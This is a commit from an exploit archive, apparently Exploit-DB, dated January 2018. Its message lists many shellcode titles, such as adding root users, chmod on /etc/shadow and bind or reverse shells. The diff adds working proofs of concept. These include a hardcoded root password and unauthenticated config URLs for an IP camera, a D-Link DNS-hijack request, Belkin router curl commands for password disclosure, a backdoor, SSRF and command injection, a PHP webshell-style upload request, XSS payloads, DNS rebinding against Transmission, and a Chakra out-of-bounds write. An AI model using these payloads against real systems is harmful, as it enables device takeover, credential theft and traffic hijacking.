DB: 2018-01-18

76 changes to exploits/shellcodes Printoxx - Local Buffer Overflow (PoC) Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC) Printoxx - Local Buffer Overflow (PoC) Picpuz 2.1.1 - Buffer Overflow (Denial of Service) (PoC) Microsoft Edge Chakra JIT - Incorrect Bounds Calculation Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion Microsoft Edge Chakra - Incorrect Scope Handling Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2) Microsoft Edge Chakra JIT - Out-of-Bounds Write Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read Microsoft Edge Chakra JIT - Stack-to-Heap Copy Transmission - RPC DNS Rebinding Master IP CAM 01 - Multiple Vulnerabilities Zomato Clone Script - Arbitrary File Upload Reservo Image Hosting Script 1.5 - Cross-Site Scripting D-Link DSL-2640R - Unauthenticated DNS Change Belkin N600DB Wireless Router - Multiple Vulnerabilities SugarCRM 3.5.1 - Cross-Site Scripting Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes) Linux/x86 - HTTP Server (8800/TCP) + fork() Shellcode (166 bytes) Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Append RSA Key to /root/.ssh/authorized_keys2 Shellcode (295 bytes) Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes) Linux/x86 - Set System Time to 0 + exit() Shellcode (12 bytes) Linux/x86 - chmod 0666 /etc/shadow + exit Shellcode (36 bytes) Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (36 bytes) Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes) Linux/x86 - Add Root User (xtz) To /etc/passwd + No Password Shellcode (59 bytes) Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes) Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes) Linux/x86 - write(0__Hello core!\n__12) + Exit Shellcode (36/43 bytes) Linux/x86 - write(0__Hello core!\n__12) + exit() Shellcode (36/43 bytes) Linux/x86 - execve(/bin/sh) Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) + Standard Opcode Array Payload Shellcode (21 bytes) Linux/x86 - Alphanumeric Encoder (IMUL Method) Shellcode (88 bytes) Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes) Linux/x86 - execve(/bin/sh) Alphanumeric Shellcode (392 bytes) Linux/x86 - execve(/bin/sh) + Alphanumeric Shellcode (392 bytes) Linux/x86 - Add Root User (t00r) + Anti-IDS Shellcode (116 bytes) Linux/x86 - Add Root User (t00r) To /etc/passwd + Anti-IDS Shellcode (116 bytes) Linux/x86 - Add Root User (t00r) Shellcode (82 bytes) Linux/x86 - Add Root User (t00r) To /etc/passwd Shellcode (82 bytes) Linux/x86 - Add Root User (z) Shellcode (70 bytes) Linux/x86 - Add Root User (z) To /etc/passwd Shellcode (70 bytes) Windows x86 - PEB _Kernel32.dll_ ImageBase Finder Alphanumeric Shellcode (67 bytes) Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes) Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes) Linux/x86 - Add Root User (toor) To /etc/passwd + exit() Shellcode (107 bytes) Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode (83 bytes) Linux/x86 - Fork Bomb Alphanumeric Shellcode (117 bytes) Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes) Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes) Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes) Linux/x86 - unlink /etc/shadow Shellcode (33 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) Shellcode (390 bytes) Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes) Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes) Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes) Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes) Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes) FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes) FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes) Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes) Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes) Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes) Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes) Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + Polymorphic Shellcode Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes) Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes) Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes) Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1) Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator) Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes) Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes) Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes) Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes) Linux/x86 - execve(/bin/sh /tmp/p00p) Shellcode (70 bytes) Linux/x86 - execve(/bin/ash) + exit() Shellcode (34 bytes) Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes) Linux/x86 - setuid() + execve() + exit() Shellcode (44 bytes) Linux/x86 - chmod(/bin/sh_04775) + set sh +s Shellcode (31 bytes) Linux/x86 - socket-proxy Shellcode (372 bytes) (Generator) Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes) Linux/x86 - Reverse TCP (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes) Linux/x86 - Bind TCP (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes) Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes) Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes) Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes) Linux/x86 - setuid(0) + chmod(/etc/shadow_ 0666) Shellcode (37 bytes) Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes) Linux/x86 - Remote File Download Shellcode (42 bytes) Linux/x86 - CDRom Ejecting Shellcode (46 bytes) Linux/x86 - sethostname(PwNeD !!_ 8) Shellcode (32 bytes) Linux/x86 - exit(0) Shellcode (8 bytes) Linux/x86 - sync Shellcode (6 bytes) Linux/x86 - execve(/bin/sh_ -c_ ping localhost) Shellcode (55 bytes) Linux/x86 - rmdir(_/tmp/willdeleted_) Shellcode (41 bytes) Linux/x86 - setdomainname(_th1s s3rv3r h4s b33n h1j4ck3d !!_) Shellcode (58 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes) Linux/x86 - Force unmount /media/disk Shellcode (33 bytes) Linux/x86 - chmod(/etc/shadow_ 0666) + ASCII Shellcode (443 bytes) Linux/x86 - CDRom Ejecting + Polymorphic Shellcode (74 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell + Polymorphic Shellcode (125 bytes) Linux/x86 - /sbin/iptables -POUTPUT DROP Shellcode (60 bytes) Linux/x86 - /usr/bin/killall snort Shellcode (46 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (3) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (5) Linux/x86 - execve(/bin/dash) Shellcode (49 bytes) Linux/x86 - execve(/bin/cat_ /etc/shadow_ NULL) Shellcode (42 bytes) Linux/x86 - /etc/init.d/apparmor teardown Shellcode (53 bytes) Linux/x86 - setreuid() + /sbin/iptables -F + exit(0) Shellcode (76 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - execve(/bin/sh) Shellcode (28 bytes) Linux/x86 - mkdir(hacked) + exit() Shellcode (36 bytes) Linux/x86 - Stager Reads Second Stage From STDIN Shellcode (14 bytes) Linux/x86 - iptables --flush Shellcode (43 bytes) Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (2) Linux/x86 - Force Reboot Shellcode (36 bytes) Linux/x86 - execve(chmod 0777 /etc/shadow) Shellcode (57 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell + SO_REUSEADDR Set (Avoiding SIGSEGV) Shellcode (103 bytes) Linux/x86 - Reverse TCP (127.1.1.1:55555/TCP) Shell Shellcode (72 bytes) Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (65 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell + GetPC/Call/Ret Method Shellcode (89 bytes) Linux/x86 - Bind TCP (1111/TCP) Shell Shellcode (73 bytes) Linux/x86 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes) Linux/x86 - Egghunter Shellcode (38 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4) Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)
2018-01-18 05:02:25 +00:00 · 2018-01-18 05:02:25 +00:00 · 1db36d5e8b
commit 1db36d5e8b
parent 909c94ce89
72 changed files with 3289 additions and 41 deletions
--- a/exploits/hardware/remote/43693.txt
+++ b/exploits/hardware/remote/43693.txt
@ -0,0 +1,68 @@
+# Exploit Title: Master IP CAM 01 Multiple Vulnerabilities
+# Date: 17-01-2018
+# Remote: Yes
+# Exploit Authors: Daniele Linguaglossa, Raffaele Sabato
+# Contact: https://twitter.com/dzonerzy, https://twitter.com/syrion89
+# Vendor: Master IP CAM
+# Version: 3.3.4.2103
+# CVE: CVE-2018-5723, CVE-2018-5724, CVE-2018-5725, CVE-2018-5726
+
+I DESCRIPTION
+========================================================================
+The Master IP CAM 01 suffers of multiple vulnerabilities:
+
+# [CVE-2018-5723] Hardcoded Password for Root Account
+# [CVE-2018-5724] Unauthenticated Configuration Download and Upload
+# [CVE-2018-5725] Unauthenticated Configuration Change
+# [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
+
+
+II PROOF OF CONCEPT
+========================================================================
+
+## [CVE-2018-5723] Hardcoded Password for Root Account
+
+Is possible to access telnet with the hardcoded credential root:cat1029
+
+
+## [CVE-2018-5724] Unauthenticated Configuration Download and Upload
+
+Download:
+
+http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi
+
+Upload Form:
+
+### Unauthenticated Configuration Upload
+<form name="form6" method="post" enctype="multipart/form-data"
+action="cgi-bin/hi3510/restore.cgi" >
+<input type="file" name="setting_file" >
+<input type="submit" value="restore" >
+</form>
+
+
+## [CVE-2018-5725] Unauthenticated Configuration Change
+
+Change configuration:
+
+http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080
+
+List of available commands here:
+http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
+
+
+## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure
+
+Retrieve sensitive information:
+
+http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser
+
+
+III REFERENCES
+========================================================================
+http://syrion.me/blog/master-ipcam/
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5723
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5724
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5725
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5726
+http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf
--- a/exploits/hardware/webapps/43678.txt
+++ b/exploits/hardware/webapps/43678.txt
@ -0,0 +1,54 @@
+#
+#
+#  D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability
+#
+#  Firmware Version: UK_1.06 Hardware Version: B1
+#
+#  Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
+#
+#  https://ethical-hacker.org/
+#  https://facebook.com/ethicalhackerorg/
+#
+#  Description:  
+#  The vulnerability exist in the web interface.
+#  D-Link's various routers are susceptible to unauthorized DNS change. 
+#  The problem is when entering an invalid / wrong user and password.  
+#
+#  ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link 
+#  DEVICES MAY AFFECTED.
+#
+#  Once modified, systems use foreign DNS servers,  which are 
+#  usually set up by cybercriminals. Users with vulnerable 
+#  systems or devices who try to access certain sites are 
+#  instead redirected to possibly malicious sites.
+#  
+#  Modifying systems' DNS settings allows cybercriminals to 
+#  perform malicious activities like:
+#
+#    o  Steering unknowing users to bad sites: 
+#       These sites can be phishing pages that 
+#       spoof well-known sites in order to 
+#       trick users into handing out sensitive 
+#       information.
+#
+#    o  Replacing ads on legitimate sites: 
+#       Visiting certain sites can serve users 
+#       with infected systems a different set 
+#       of ads from those whose systems are 
+#       not infected.
+#   
+#    o  Controlling and redirecting network traffic: 
+#       Users of infected systems may not be granted 
+#       access to download important OS and software 
+#       updates from vendors like Microsoft and from 
+#       their respective security vendors.
+#
+#    o  Pushing additional malware: 
+#       Infected systems are more prone to other 
+#       malware infections (e.g., FAKEAV infection).
+#
+#  
+
+Proof of Concept:
+
+http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS>
--- a/exploits/hardware/webapps/43682.txt
+++ b/exploits/hardware/webapps/43682.txt
@ -0,0 +1,55 @@
+# Exploit Title: Belkin N600DB Wireless Router | Multiple Vulnerabilities
+# Date: 16/01/2018
+# Exploit Author: Wadeek
+# Hardware Version: F9K1102as v3
+# Firmware Version: 3.04.11
+# Vendor Homepage: http://www.belkin.com/fr/support/product/?pid=F9K1102as
+# Firmware Link: http://cache-www.belkin.com/support/dl/F9K1102_WW_3.04.11.bin
+
+== Wireless Fingerprinting ==
+#===========================================
+:ESSID: "belkin.XXX"
+:Mode: Master
+:Encryption key WPA2 Version 1 CCMP PSK: on
+:Wireless Password/PIN: 8-alphanumeric
+:DHCP: enable (192.168.2.1)
+:MAC Address: 58:EF:68
+#===========================================
+
+== Web Fingerprinting (With Locked Web Interface) ==
+#===========================================
+:www.shodan.io: "Server: httpd" "Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0" "100-index.htm"
+#===========================================
+:Device images:
+/images/troubleshooting/checkWires.png (600x270)
+/images/troubleshooting/startModem.png (600x270)
+/images/troubleshooting/stopModem.png (600x270)
+/images/troubleshooting/restartRouter.png (600x270)
+#===========================================
+:Hardware version,Firmware version,Serial number,...: /cgi/cgi_st.js && /cgi/cgi_dashboard.js
+#===========================================
+
+== PoC ==
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Disclore wifi password: 
+curl --silent "http://192.168.2.1/langchg.cgi" 
+|| 
+curl --silent "http://192.168.2.1/adv_wifidef.cgi"
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Closed "HTTPD server" port:
+curl --silent "http://192.168.2.1/removepwd.cgi" --data ""
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Web Backdoor:
+http://192.168.2.1/dev.htm
+> ?
+> sh
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Server-Side Request Forgery (HTTP/FTP):
+{45.33.32.156 == scanme.nmap.org}
+curl --silent "http://192.168.2.1/proxy.cgi?chk&url=http://45.33.32.156/"
+||
+curl --silent "http://192.168.2.1/proxy.cgi?chk&url=ftp://45.33.32.156/"
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+:Command Injection:
+curl --silent "http://192.168.2.1/proxy.cgi?chk&url=--help"
+#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
--- a/exploits/multiple/remote/43665.md
+++ b/exploits/multiple/remote/43665.md
@ -0,0 +1,65 @@
+The transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc.
+
+Clients interact with the daemon using JSON RPC requests to a web server listening on port 9091. By default, the daemon will only accept requests from localhost.
+
+A sample RPC session looks like this:
+
+```
+$ curl -H 'X-Transmission-Session-Id: foo'  -sI '{}' http://localhost:9091/transmission/rpc
+HTTP/1.1 409 Conflict
+Server: Transmission
+X-Transmission-Session-Id: JL641xTn2h53UsN6bVa0kJjRBLA6oX1Ayl06AJwuhHvSgE6H
+Date: Wed, 29 Nov 2017 21:37:41 GMT
+```
+
+```
+$ curl -H 'X-Transmission-Session-Id: JL641xTn2h53UsN6bVa0kJjRBLA6oX1Ayl06AJwuhHvSgE6H'  -d '{"method":"session-set","arguments":{"download-dir":"/home/user"}}' -si http://localhost:9091/transmission/rpc
+HTTP/1.1 200 OK
+Server: Transmission
+Content-Type: application/json; charset=UTF-8
+Date: Wed, 29 Nov 2017 21:38:57 GMT
+Content-Length: 36
+
+{"arguments":{},"result":"success"}
+```
+
+As with all HTTP RPC schemes like this, any website can send requests to the daemon with XMLHttpRequest, but the theory is they will be ignored because requests must read and request a specific header, X-Transmission-Session-Id. Unfortunately, this design doesn't work because of an attack called "dns rebinding". Any website can simply create a dns name that they are authorized to communicate with, and then make it resolve to localhost.
+
+The attack works like this:
+
+1. A user visits http://attacker.com.
+2. attacker.com has an <iframe> to attack.attacker.com, and have configured their DNS server to respond alternately with 127.0.0.1 and 123.123.123.123 (an address they control) with a very low TTL.
+3. When the browser resolves to 123.123.123.123, they serve HTML that waits for the DNS entry to expire, then they XMLHttpRequest to attack.attacker.com and have permission to read and set headers.
+
+You can test this attack like this, I have a domain I use for testing called rbndr.us, you can use this page to generate hostnames:
+
+https://lock.cmpxchg8b.com/rebinder.html
+
+Here I want to alternate between 127.0.0.1 and 199.241.29.227, so I use 7f000001.c7f11de3.rbndr.us:
+
+```
+$ host 7f000001.c7f11de3.rbndr.us
+7f000001.c7f11de3.rbndr.us has address 127.0.0.1
+$ host 7f000001.c7f11de3.rbndr.us
+7f000001.c7f11de3.rbndr.us has address 199.241.29.227
+$ host 7f000001.c7f11de3.rbndr.us
+7f000001.c7f11de3.rbndr.us has address 127.0.0.1
+```
+
+Here you can see the resolution alternates between the two addresses I want (note that depending on caching it might take a while to switch, the TTL is set to minimum but some servers round up).
+
+I just wait for the cached response to expire, and then POST commands to the server.
+
+Exploitation is simple, you could set script-torrent-done-enabled and run any command, or set download-dir to /home/user/ and then upload a torrent for ".bashrc". 
+
+Here is my (simple) demo:
+
+http://lock.cmpxchg8b.com/Asoquu3e.html
+
+See screenshots for how it's supposed to work, I've only tested it on fedora with `yum install transmission-daemon` and all default settings, but this should work on any platform that transmission supports.
+
+EDB Note ~ https://bugs.chromium.org/p/project-zero/issues/detail?id=1447
+EDB Note ~ https://github.com/transmission/transmission/pull/468
+EDB Note ~ https://github.com/taviso/rbndr/tree/a189ffd9447ba78aa2702c5649d853b6fb612e3b
+
+Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43665.zip
--- a/exploits/php/webapps/43667.txt
+++ b/exploits/php/webapps/43667.txt
@ -0,0 +1,96 @@
+# # # # # 
+# Zomato Clone  - Arbitrary File Upload
+# Date: 16.01.2018
+# Vendor Homepage: http://www.phpscriptsmall.com/
+# Software Link: http://www.exclusivescript.com/product/099S4111872/php-scripts/zomato-clone-script
+# Demo: http://jhinstitute.com/demo/foodpanda/
+# Version: N/A
+# Category: Webapps
+# Tested on: Windows 10
+# Exploit Author: Tauco
+
+Testing for malicious files verifies that the application/system is able to correctly protect against attackers uploading malicious files. Vulnerabilities related to the uploading of malicious files is unique in that these “malicious” files can easily be rejected through including business logic that will scan files during the upload process and reject those perceived as malicious. Additionally, this is different from uploading unexpected files in that while the file type may be accepted the file may still be malicious to the system.
+
+Proof of concept:
+===================================================================================
+POST /demo/foodpanda/myacount.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+
+-----------------------------41184676334
+Content-Disposition: form-data; name="fname"
+
+test
+-----------------------------41184676334
+Content-Disposition: form-data; name="lname"
+
+test
+-----------------------------41184676334
+Content-Disposition: form-data; name="email"
+
+test@test.com
+-----------------------------41184676334
+Content-Disposition: form-data; name="phone"
+
+123
+-----------------------------41184676334
+Content-Disposition: form-data; name="image"; filename="info.php.jpg" (change extension to .php)
+Content-Type: image/jpeg
+
+<?php
+phpinfo();
+?>
+-----------------------------41184676334
+Content-Disposition: form-data; name="addr1"
+
+test
+-----------------------------41184676334
+Content-Disposition: form-data; name="addr2"
+
+test
+-----------------------------41184676334
+Content-Disposition: form-data; name="post"
+
+
+-----------------------------41184676334
+Content-Disposition: form-data; name="country"
+
+1
+-----------------------------41184676334
+Content-Disposition: form-data; name="state"
+
+3945
+-----------------------------41184676334
+Content-Disposition: form-data; name="city"
+
+16315
+-----------------------------41184676334
+Content-Disposition: form-data; name="location"
+
+test
+-----------------------------41184676334
+Content-Disposition: form-data; name="update"
+
+Upload
+-----------------------------41184676334--
+
+
+===================================================================================
+
+Open file location : /demo/foodpanda/photo/mid/[...php]
+
+
+Description:
+==========================================================
+ 
+ 
+Request Method(s):              [+]  POST & GET
+ 
+ 
+Vulnerable Product:             [+]  Zomato Clone Script
+ 
+ 
+Vulnerable Parameter(s):        [+]  filename
--- a/exploits/php/webapps/43676.txt
+++ b/exploits/php/webapps/43676.txt
@ -0,0 +1,30 @@
+# Exploit Title: Reservo Image Hosting Script 1.5 - Cross Site Scripting
+# Date: 15-01-2018
+# Exploit Author: Dennis Veninga
+# Contact Author: d.veninga [at] networking4all.com
+# Vendor Homepage: reservo.co
+# Version: 1.6
+# CVE-ID: CVE-2018-5705
+
+With support for automatic thumbnails & image resizing in over 200 image
+formats, robust privacy options, secure image manager, external storage a
+feature rich admin area and free migration scripts, Reservo really does
+tick every box.
+
+
+Reservo Image Hosting is vulnerable to XSS attacks. The affected function
+is its search engine. Since there is an user/admin login interface, it's
+possible for attackers to steal sessions of users and thus admin(s). By
+sending users an infected URL, code will be executed.
+
+---------------------------
+---------------------------
+PoC:
+
+https://
+{{target}}/search/?s=image&t=%27%29%3B%2522%2520style%253D%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C
+---------------------------
+---------------------------
+
+Evil javascript code can be inserted and will be executed when visiting the
+link
--- a/exploits/php/webapps/43683.txt
+++ b/exploits/php/webapps/43683.txt
@ -0,0 +1,29 @@
+# Exploit Title: sugarCRM 3.5.1 XSS refeclted
+# Date: 16/01/2017
+# Exploit Author: Guilherme Assmann
+# Vendor Homepage: https://www.sugarcrm.com/
+# Version: 3.5.1
+# Tested on: kali linux, windows 7, 8.1, 10, ubuntu - Firefox
+# Download https://sourceforge.net/projects/sugarcrm/files/SugarCRM%20Release%20Archive/Sugar%20Suite%203.5.1/
+# CVE: CVE-2018-5715
+More informations: https://m4k4br0.github.io/sugarcrm-xss/
+
+The vulnerability are in the key parameter of phpprint.php
+
+32 foreach ($_GET as $key => $val) {
+33   if ($key != "print") {
+34     if (is_array($val)) {
+35       foreach ($val as $k => $v) {
+36         $query_string .= "{$key}[{$k}]=" . urlencode($v) . "&";
+37       }
+38     }
+39     else {
+40       $query_string .= "{$key}=" . urlencode($val) . "&";
+41     }
+42   }
+43 }
+
+the $key variable are not encoded, this permit that XSS more easy
+---------------------------------------------------------------------
+Poc:
+http://vulnerable/index.php?action=Login&module=Users&print=a&"/><script>alert('xss')</script>
--- a/exploits/windows/dos/43710.js
+++ b/exploits/windows/dos/43710.js
@ -0,0 +1,79 @@
+/*
+Let's start with comments in the "GlobOpt::TrackIntSpecializedAddSubConstant" method.
+            // Track bounds for add or sub with a constant. For instance, consider (b = a + 2). The value of 'b' should track
+            // that it is equal to (the value of 'a') + 2. That part has been done above. Similarly, the value of 'a' should
+            // also track that it is equal to (the value of 'b') - 2.
+
+This means "j" will be guaranteed to be in the range of INT_MIN to 15(INT_MAX - 0x7ffffff0) at (a) in the following code. In detail, it uses "BailOutOnOverflow", which makes the JITed code bailout when an integer overflow occurs, to ensure the range.
+
+function opt(j) {
+    let k = j + 0x7ffffff0;
+    // (a)
+}
+
+
+But if integer overflows continuously occur in the JITed code or it's known that "k" doesn't fit in an int at compile time, Chakra considers "k" to be a float.
+
+For example, in the following code where "j" is always greater than 100, "k" is considered a float. So it doesn't use "BailOutOnOverflow" for the add operation.
+
+function opt(j) {
+    if (j <= 100)
+        return;
+
+    let k = j + 0x7ffffff0;
+}
+
+
+Now, let's take a look at the PoC.
+
+function opt() {
+    let j = 0;
+    for (let i = 0; i < 2; i++) {
+        // (a)
+        j += 0x100000;
+        // (b)
+        let k = j + 0x7ffffff0; // (c)
+    }
+}
+
+Note that all loops are analyzed twice in the JIT optimization process.
+
+Here's what happens in the analyses.
+
+In the first analysis:
+At (b), Chakra considers "j" to be in the range of INT_MIN to INT_MAX.
+At (c), INT_MAX + 0x7ffffff0 overflows but INT_MIN + 0x7ffffff0 doesn't, so it assumes "k" may fit in an int and that "BailOutOnOverflow" will be used to ensure "j" to be in the range of INT_MIN to 15.
+
+In the second analysis:
+At (a), Chakra considers "j" to be in the range of 0 to 15.
+At (b), Chakra considers "j" to be in the range of 0x100000 to 0x10000f.
+At (c), in both cases of 0x100000 + 0x7ffffff0 and 0x10000f + 0x7ffffff0, an integer overflow occurs. So "k" is considered a float.
+
+
+In the first analysis, it made two assumptions: "k" will be an int, and therefore "BailOutOnOverflow" will be used. But actually, both assumptions are wrong. "k" will be a float. And "BailOutOnOverflow" will never be used.
+
+However it's already guaranteed "j" to be in the range of INT_MIN to 15 at (a) based on the wrong assumptions. We can abuse this.
+
+PoC demonstrating OOB write:
+*/
+function opt(arr) {
+    if (arr.length <= 15)
+        return;
+
+    let j = 0;
+    for (let i = 0; i < 2; i++) {
+        arr[j] = 0x1234;  // (a)
+        j += 0x100000;
+        j + 0x7ffffff0;
+    }
+}
+
+function main() {
+    for (let i = 0; i < 0x10000; i++) {
+        opt(new Uint32Array(100));
+    }
+}
+
+main();
+
